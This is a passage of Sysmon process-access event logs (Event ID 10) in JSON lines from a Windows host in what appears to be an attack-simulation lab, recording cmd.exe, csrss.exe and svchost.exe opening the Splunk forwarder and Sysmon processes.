{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3285,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-0010582F0500}\r\nSourceProcessId: 4300\r\nSourceThreadId: 4348\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-0010582F0500}","SourceProcessId":"4300","SourceThreadId":"4348","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","TargetProcessId":"4368","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3286,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","TargetProcessId":"4368","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3287,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3288,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3289,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3290,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3291,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3292,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.184","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3293,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.184\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 